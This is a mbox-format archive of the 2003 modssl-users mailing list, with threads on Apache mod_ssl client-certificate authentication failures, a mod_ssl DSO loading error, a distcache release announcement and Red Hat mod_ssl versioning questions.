[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done

[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher: =
RC4-MD5
(128/128 bits)

[info] Initial (No.1) HTTPS request received for child 6 =
(xxx.xxx.xxx:4443)

[info] Connection to child 6 closed with unclean =
shutdown(xxx.xxx.xxx:4443,
client xxx.xxx.xxx.xxx)

[info] Connection to child 5 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)

[info] Seeding PRNG with 512 bytes of entropy

[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start

[info] Connection to child 3 established (xxx.xxx.xxx:4443, client
xxx.xxx.xxx.xxx)

[info] Seeding PRNG with 512 bytes of entropy

[debug] ssl_engine_kernel.c(1757): OpenSSL: Handshake: start



[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done

[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher: =
RC4-MD5
(128/128 bits)



[debug] ssl_engine_kernel.c(1761): OpenSSL: Handshake: done

[info] Connection: Client IP: xxx.xxx.xxx.xxx, Protocol: SSLv3, Cipher: =
RC4-MD5
(128/128 bits)



[info] Initial (No.1) HTTPS request received for child 5 =
(xxx.xxx.xxx:4443)

[info] Initial (No.1) HTTPS request received for child 3 =
(xxx.xxx.xxx:4443)

[info] Connection to child 5 closed with unclean =
shutdown(xxx.xxx.xxx:4443,
client xxx.xxx.xxx.xxx)

[info] Connection to child 3 closed with unclean =
shutdown(xxx.xxx.xxx:4443,
client xxx.xxx.xxx.xxx)



You can see that there is 4 connections. But every connection is closed =
with
unclean shutdown, I don't know why.



Regards

Juanan





Nauman, Ahmed [IT] escribi=F3:







Hi all,
 
I had earlier mailed my problem also related =
to client authentication. That i have set apache with mod ssl for mutual =
authentication, but client certificate does not seem to be transferred =
for authentication. But surprizingly this is happening when i mention CA =
of client in httpd.conf for Server as =

"SSLCACertificateFile" directive. =
If i don't mention this directive, it displays a message on browser side =
that certificate is not from some of the trusted CA. If we see the log, =
[Please see list archive for my previous message] either the Server is =
not loading the certificate of client's CA properly or client =
Certificate does not seem to be returned when server asks for =
it.
 
Please =
advise.
 
Regards
Nauman
 
-----Original =
Message-----
From: Estrade Matthieu [mailto:estrade-m@ifrance.com]
Sent: Wednesday, May 14, 2003 8:24 =
AM
To: modssl-users@modssl.org<=
/o:p>
Subject: Re: Apache 2 and client =
authenticaction
 
 
Hi,
 
I have exactly the same problem. On each new =
document (not in temp file 
of IE), my browser ask me to choose which =
client certificate i want to 
use for the secured web =
site.
Even if i have only =
one.
First, i was thinking it was because of the =
browser, so i looked into IE 
configuration, but i found =
nothing.
Then i look with apache in debug mode and i =
saw that the client seems to 
no send again the =
certificate.
 
Maybe it's a problem of session handling. i =
played with SessionCache 
parameters and SessionCacheTimeout, but =
nothing more happened.
I will try to find more debug =
information.
 
Regards,
 
Estrade =
Matthieu
 
Juan Angel Martin =
wrote:
 
=A0 =




Hi all,
 
I have one Linux server with Apache 1.3.27 =
and it's configured for 
client authentication in one =
port.
 
When I connect with it at that port with IE =
6.0.or Netscape 7.0 or 
4.78, the server asks me the container's =
password that keeps the 
private key needed for authenticate me only =
one time.
 
But I have another with Apache 2.0.45, =
configured as the other one 
with 1.3.27; it has the same SSL virtual =
hosts configuration options.
 
With this server, the server asks me the =
container's password that 
keeps the private key needed for authenticate =
me for every frame o 
picture that the page =
shows.
 
How can I get that the server with Apache =
2.0.45 only asks me for the 
password one time like the other one with =
Apache 1.3.27?
 
Thanks in =
advance
Juanan
 
______________________________________________=
________________________
Apache Interface to OpenSSL (mod_ssl)=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0 www.modssl.org
User Support Mailing List=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0 modssl-users@modssl.org<=
/o:p>
Automated List Manager=A0=A0=A0=A0=A0=A0 =A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0majordomo@modssl.org<=
/span>
______________________________________________=
_______________________
Envie de discuter en "live" avec =
vos amis ? T=E9l=E9charger MSN =
Messenger
http://www.ifrance.com/_reloc/m<=
/a> la 1=E8re messagerie instantan=E9e de =
France
 
=A0=A0=A0 =




 
 
______________________________________________=
_______________________
Envie de discuter en "live" avec =
vos amis ? T=E9l=E9charger MSN =
Messenger
http://www.ifrance.com/_reloc/m<=
/a> la 1=E8re messagerie instantan=E9e de =
France
 
______________________________________________=
________________________
Apache Interface to OpenSSL (mod_ssl)=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0 www.modssl.org
User Support Mailing List=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0 modssl-users@modssl.org<=
/o:p>
Automated List Manager=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 majordomo@modssl.org<=
/span>
______________________________________________=
________________________
Apache Interface to OpenSSL (mod_ssl)=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0 www.modssl.org
User Support Mailing List=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0 modssl-users@modssl.org<=
/o:p>
Automated List Manager=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 majordomo@modssl.org<=
/span>
 
 
=A0 =




 









------=_NextPart_000_0001_01C31A5C.A65EF420--


_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? Télécharger MSN Messenger
http://www.ifrance.com/_reloc/m la 1ère messagerie instantanée de France

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 15 17:30:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D0F5B2AA032; Thu, 15 May 2003 17:30:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spf1.us.outblaze.com (205-158-62-158.outblaze.com [205.158.62.158])
	by master.modssl.org (Postfix) with SMTP id 600BF2AA015
	for ; Thu, 15 May 2003 17:29:14 +0200 (CEST)
Received: (qmail 3423 invoked from network); 15 May 2003 15:29:09 -0000
Received: from unknown (205.158.62.68)
  by spf1.us.outblaze.com with QMQP; 15 May 2003 15:29:09 -0000
Received: (qmail 90078 invoked from network); 15 May 2003 15:28:14 -0000
Received: from unknown (HELO ws1-10.us4.outblaze.com) (205.158.62.111)
  by 205-158-62-153.outblaze.com with SMTP; 15 May 2003 15:28:14 -0000
Received: (qmail 27582 invoked by uid 1001); 15 May 2003 15:28:13 -0000
Message-ID: <20030515152813.27581.qmail@iname.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [194.228.23.10] by ws1-10.us4.outblaze.com with http for
    bos@writeme.com; Thu, 15 May 2003 10:28:13 -0500
From: "Jirka Vejrazka" 
To: modssl-users@modssl.org
Date: Thu, 15 May 2003 10:28:13 -0500
Subject: errors starting apache2.0.45  with mod_ssl as DSO.
X-Originating-Ip: 194.228.23.10
X-Originating-Server: ws1-10.us4.outblaze.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jirka Vejrazka" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> # ./httpd -DSSL
> Syntax error on line 233 of /etc/apache/httpd.conf:
> Cannot load /usr/apache/libexec/mod_ssl.so into
> server: ld.so.1: ./httpd: fatal: relocation error:
> file /usr/apache/libexec/mod_ssl.so: symbol
> X509_INFO_free: referenced symbol not found

  Hi, 

  make sure that you have OpenSSL compiled dynamically (./config shared) and zlib too (./configure -s). I've had the same problem on Solaris. Also make sure that you have correct paths and/or links set, OpenSSL likes to put its libraries to /usr/local/ssl/lib where other applications cannot find it. I usually update LD_LIBRARY_PATH or set symbolic links to libcrypto and libssl to /usr/lib.

  Jirka Vejrazka
-- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 15 22:00:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 763282AA032; Thu, 15 May 2003 22:00:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR002.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id E395A2AA015
	for ; Thu, 15 May 2003 21:59:33 +0200 (CEST)
Received: from grumpy.geoffnet ([24.202.231.211])
 by VL-MS-MR002.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HEY009O622GWX@VL-MS-MR002.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 15 May 2003 15:56:41 -0400 (EDT)
Received: by grumpy.geoffnet (sSMTP sendmail emulation); Thu,
 15 May 2003 15:56:40 -0400
Date: Thu, 15 May 2003 15:56:40 -0400
From: Geoff Thorpe 
Subject: [ANNOUNCE] distcache 0.4.1
To: Apache Users 
Cc: ModSSL Users 
Message-id: <200305151556.40003.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: KMail/1.5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

Distcache version 0.4.1 has been released, and with it a patch/README for 
Apache 2.0.45. The existing support for Apache 1.3 (mod_ssl version 
2.8.14) remains.

If you want shared SSL/TLS session caching between servers, please give it 
a try;

   http://www.distcache.org/

Regards,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 15 22:06:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D633F2AA036; Thu, 15 May 2003 22:06:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny03.ssmb.com (mail1.ssmb.COM [199.67.139.25])
	by master.modssl.org (Postfix) with ESMTP id ADB4C2AA015
	for ; Thu, 15 May 2003 22:05:30 +0200 (CEST)
Received: from imbarc-ny02.ny.ssmb.com (imbarc-ny02-1 [162.124.186.139])
	by imbaspam-ny03.ssmb.com (8.12.9/8.12.9/SSMB_EXT/evision: 1.19 $) with ESMTP id h4FK5Rg0007638
	for ; Thu, 15 May 2003 16:05:28 -0400 (EDT)
Received: from mailhub390.corp.smb.com (mailhub390.corp.smb.com [146.128.202.18])
	by imbarc-ny02.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h4FK5IP0017900
	for ; Thu, 15 May 2003 16:05:18 -0400 (EDT)
Received: from exnyims01.nj.ssmb.com (EXNYIMS01.ny.ssmb.com [162.124.190.168])
	by mailhub390.corp.smb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id QAA02069
	for ; Thu, 15 May 2003 16:05:18 -0400 (EDT)
Received: by EXNYIMS01.ny.ssmb.com with Internet Mail Service (5.5.2655.55)
	id ; Thu, 15 May 2003 16:05:14 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FBF3@exchny43.ny.ssmb.com>
From: "Nauman, Ahmed [IT]" 
To: "'modssl-users@modssl.org'" 
Subject: mutual authentication problem
Date: Thu, 15 May 2003 16:05:13 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I am sorry if you get this message twice. I am facing a strange problem with
implementation of client authentication. Please advise me.

i m trying to establish mutual authentication on apache web server. I did
this in httpd.conf file
SSLVerifyClient require

then when i accessed the server from browser - it asked me for client
certificate - i select one from the list - it displayed the message that it
is going to access a protected item i preseed OK - then it displayed error
message that certificate is not issued from trusted CA.

I added this directive

SSLCACertificateFile "path to CA file" // I got this from
freecerts.entrust.com

Now i save it, restart the server. And when i try to access it from browser
- it follows the same path but after pressing OK [see above] it does not
display error or actual page. It says the page can not be displayed. I have
seen server log - which shows the GET_CLIENT_CERTIFICATE: no certificate
returned

Why i am having this problem ? i m sepcifying client certificate. It happens
only when i specify SSLCACertificateFile directive. Please advise.
Here is log at server side

[12/May/2003 15:34:29 29091] [info]  Connection to child 0 established
(server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
[12/May/2003 15:34:29 29091] [info]  Seeding PRNG with 1160 bytes of entropy
[12/May/2003 15:34:29 29091] [error] Certificate Verification: Error (20):
unable to get local issuer certificate
[12/May/2003 15:34:29 29091] [error] SSL handshake failed (server
cddfs1.nj.ssmb.com:8443, client 168.109.64.190) (OpenSSL library error
follows)
[12/May/2003 15:34:29 29091] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
[12/May/2003 15:34:33 29091] [info]  Connection to child 0 established
(server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
[12/May/2003 15:34:33 29091] [info]  Seeding PRNG with 1160 bytes of entropy
[12/May/2003 15:34:33 29091] [error] Certificate Verification: Error (20):
unable to get local issuer certificate
[12/May/2003 15:34:33 29091] [error] SSL handshake failed (server
cddfs1.nj.ssmb.com:8443, client 168.109.64.190) (OpenSSL library error
follows)
[12/May/2003 15:34:33 29091] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned


Regards,
Nauman

-----Original Message-----
From: Geoff Thorpe [mailto:geoff@geoffthorpe.net]
Sent: Thursday, May 15, 2003 3:57 PM
To: Apache Users
Cc: ModSSL Users
Subject: [ANNOUNCE] distcache 0.4.1


Hi all,

Distcache version 0.4.1 has been released, and with it a patch/README for 
Apache 2.0.45. The existing support for Apache 1.3 (mod_ssl version 
2.8.14) remains.

If you want shared SSL/TLS session caching between servers, please give it 
a try;

   http://www.distcache.org/

Regards,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 09:41:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DC7052AA032; Fri, 16 May 2003 09:41:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from torrente.camerfirma.com (213-98-19-142.uc.nombres.ttd.es [213.98.19.142])
	by master.modssl.org (Postfix) with ESMTP id A20302AA019
	for ; Fri, 16 May 2003 09:41:45 +0200 (CEST)
Received: (qmail 1334 invoked from network); 16 May 2003 07:41:43 -0000
Received: from unknown (HELO camerfirma.com) ([192.0.0.46])
          (envelope-sender )
          by torrente.camerfirma.com (qmail-ldap-1.03) with SMTP
          for ; 16 May 2003 07:41:43 -0000
Message-ID: <3EC49637.3040703@camerfirma.com>
Date: Fri, 16 May 2003 09:41:43 +0200
From: Juan Angel Martin 
User-Agent: Mozilla/5.0 (Windows; U; Win98; es-ES; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: es-es, es
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mutual authentication problem
References: <9F1AE1497901D71185A20002A56B9B2601B0FBF3@exchny43.ny.ssmb.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Juan Angel Martin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Ahmed,

Are you sure that you have the CA certificate that have issued the cert 
that you use to autheticate in your server in SSLCACertificateFile?

Cause the main error is:

[12/May/2003 15:34:29 29091] [error] Certificate Verification: Error (20):unable to get local issuer certificate

All the best
Juanan

Nauman, Ahmed [IT] escribió:

>Hi all,
>
>I am sorry if you get this message twice. I am facing a strange problem with
>implementation of client authentication. Please advise me.
>
>i m trying to establish mutual authentication on apache web server. I did
>this in httpd.conf file
>SSLVerifyClient require
>
>then when i accessed the server from browser - it asked me for client
>certificate - i select one from the list - it displayed the message that it
>is going to access a protected item i preseed OK - then it displayed error
>message that certificate is not issued from trusted CA.
>
>I added this directive
>
>SSLCACertificateFile "path to CA file" // I got this from
>freecerts.entrust.com
>
>Now i save it, restart the server. And when i try to access it from browser
>- it follows the same path but after pressing OK [see above] it does not
>display error or actual page. It says the page can not be displayed. I have
>seen server log - which shows the GET_CLIENT_CERTIFICATE: no certificate
>returned
>
>Why i am having this problem ? i m sepcifying client certificate. It happens
>only when i specify SSLCACertificateFile directive. Please advise.
>Here is log at server side
>
>[12/May/2003 15:34:29 29091] [info]  Connection to child 0 established
>(server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
>[12/May/2003 15:34:29 29091] [info]  Seeding PRNG with 1160 bytes of entropy
>[12/May/2003 15:34:29 29091] [error] Certificate Verification: Error (20):
>unable to get local issuer certificate
>[12/May/2003 15:34:29 29091] [error] SSL handshake failed (server
>cddfs1.nj.ssmb.com:8443, client 168.109.64.190) (OpenSSL library error
>follows)
>[12/May/2003 15:34:29 29091] [error] OpenSSL: error:140890B2:SSL
>routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
>[12/May/2003 15:34:33 29091] [info]  Connection to child 0 established
>(server cddfs1.nj.ssmb.com:8443, client 168.109.64.190)
>[12/May/2003 15:34:33 29091] [info]  Seeding PRNG with 1160 bytes of entropy
>[12/May/2003 15:34:33 29091] [error] Certificate Verification: Error (20):
>unable to get local issuer certificate
>[12/May/2003 15:34:33 29091] [error] SSL handshake failed (server
>cddfs1.nj.ssmb.com:8443, client 168.109.64.190) (OpenSSL library error
>follows)
>[12/May/2003 15:34:33 29091] [error] OpenSSL: error:140890B2:SSL
>routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
>
>
>Regards,
>Nauman
>
>-----Original Message-----
>From: Geoff Thorpe [mailto:geoff@geoffthorpe.net]
>Sent: Thursday, May 15, 2003 3:57 PM
>To: Apache Users
>Cc: ModSSL Users
>Subject: [ANNOUNCE] distcache 0.4.1
>
>
>Hi all,
>
>Distcache version 0.4.1 has been released, and with it a patch/README for 
>Apache 2.0.45. The existing support for Apache 1.3 (mod_ssl version 
>2.8.14) remains.
>
>If you want shared SSL/TLS session caching between servers, please give it 
>a try;
>
>   http://www.distcache.org/
>
>Regards,
>Geoff
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:20:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9331D2AA032; Fri, 16 May 2003 18:20:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailhost.det3.ameritech.net (mailhost2-sfldmi.sfldmi.ameritech.net [206.141.193.106])
	by master.modssl.org (Postfix) with ESMTP id 3A53E2AA019
	for ; Fri, 16 May 2003 18:20:15 +0200 (CEST)
Received: from danspc ([66.73.181.217]) by mailhost.det3.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with SMTP
          id <20030516162013.FNGH176.mailhost.det3.ameritech.net@danspc>
          for ; Fri, 16 May 2003 12:20:13 -0400
From: "Dan" 
To: 
Subject: RHN ModSSL Backported Version question...
Date: Fri, 16 May 2003 12:24:37 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I currently have mod_ssl-2.0.40-11.3 installed on my server which came with
my Red Hat Linux 8, kernel 2.4.18-27.8.0 distribution disks.  I noticed that
the most current version listed on the modssl.org site for mod_ssl is
2.8.14-1.3.27 and have a few questions if anyone could assist with I would
appreciate it much.

I'm on the Red Hat Network and receive errata bug fix and security
advisories - reports for mods on my server.  Currently I don't have any bug
fix or security advisories for Mod_SSL.  Should I be worried that I have an
older version according to the mod_ssl site and upgrade my current version
of mod_ssl?

Because someone told me that the red hat version numbers do not always match
the most current mod version numbers from their originating sources and that
the mod_ssl package that I currently have from rh should be ok because red
hat
applies security fixes without changing the numbers or providing different
version numbers - backporting.  Is this correct for modssl too?  If so, how
would I find out if my version of RH mod_ssl is safe?

If I do upgrade mod_ssl to the most current version listed on the modssl.org
site, will it break anything or cause dependency issues on the server?
Because I have five live e-commerce sites using mod_ssl and Thawte
certificates, and I don't want to cause more trouble than I have.  But of
course if having the old versions poses a security risk I guess I should
upgrade.

Any advice would be appreciated.

Thanks much.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:26:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BD2572AA032; Fri, 16 May 2003 18:26:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id AE13D2AA019
	for ; Fri, 16 May 2003 18:26:12 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h4GGPun09356
	for ; Fri, 16 May 2003 17:26:01 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2656.59)
	id ; Fri, 16 May 2003 17:25:51 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2A14@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: RHN ModSSL Backported Version question...
Date: Fri, 16 May 2003 17:25:50 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Dan [mailto:mod-ssl@catalpaweb.com]
> Sent: 16 May 2003 17:25
> To: modssl-users@modssl.org
> Subject: RHN ModSSL Backported Version question...
> 
> 
> Hi,
> 
> I currently have mod_ssl-2.0.40-11.3 installed on my server 
> which came with
> my Red Hat Linux 8, kernel 2.4.18-27.8.0 distribution disks.  
> I noticed that
> the most current version listed on the modssl.org site for mod_ssl is
> 2.8.14-1.3.27 and have a few questions if anyone could assist 
> with I would
> appreciate it much.
> 
> I'm on the Red Hat Network and receive errata bug fix and security
> advisories - reports for mods on my server.  Currently I 
> don't have any bug
> fix or security advisories for Mod_SSL.  Should I be worried 
> that I have an
> older version according to the mod_ssl site and upgrade my 
> current version
> of mod_ssl?
> 
> Because someone told me that the red hat version numbers do 
> not always match
> the most current mod version numbers from their originating 
> sources and that
> the mod_ssl package that I currently have from rh should be 
> ok because red
> hat
> applies security fixes without changing the numbers or 
> providing different
> version numbers - backporting.  Is this correct for modssl 
> too?  If so, how
> would I find out if my version of RH mod_ssl is safe?
> 
> If I do upgrade mod_ssl to the most current version listed on 
> the modssl.org
> site, will it break anything or cause dependency issues on the server?
> Because I have five live e-commerce sites using mod_ssl and Thawte
> certificates, and I don't want to cause more trouble than I 
> have.  But of
> course if having the old versions poses a security risk I 
> guess I should
> upgrade.
> 
> Any advice would be appreciated.
> 
> Thanks much.
> 
I think I've answered your question via the openssl-users list. Let me know
if I haven't.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Appeasement is the policy of being nice to a crocodile in the hope that he
will eat you last. (Winston Churchill)


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:29:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 668E92AA032; Fri, 16 May 2003 18:29:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 8569D2AA019
	for ; Fri, 16 May 2003 18:29:22 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 3AEAA6E402E; Fri, 16 May 2003 18:29:17 +0200 (CEST)
Date: Fri, 16 May 2003 18:29:17 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: RHN ModSSL Backported Version question...
Message-ID: <20030516162917.GA32706@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, May 16, 2003 at 12:24:37PM -0400, Dan wrote:
> I currently have mod_ssl-2.0.40-11.3 installed on my server which came with
> my Red Hat Linux 8, kernel 2.4.18-27.8.0 distribution disks.  I noticed that
> the most current version listed on the modssl.org site for mod_ssl is
> 2.8.14-1.3.27 and have a few questions if anyone could assist with I would
> appreciate it much.
> 
This is really becomming the most frequently asked question. The mod_ssl on
www.modssl.org is only for apache 1.3 - 2.8.14-1.3.27 works only with 
apache-1.3.27. Your apache is from the 2.0 series and comes with mod_ssl
built in - so by having the most recent version of apache 2.0, you'll
also have the most recent mod_ssl for that apache. I don't know the specifics
of redhats numbering scheme, but the most recent Apache/mod_ssl is 2.0.45

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:50:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D937D2AA032; Fri, 16 May 2003 18:50:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
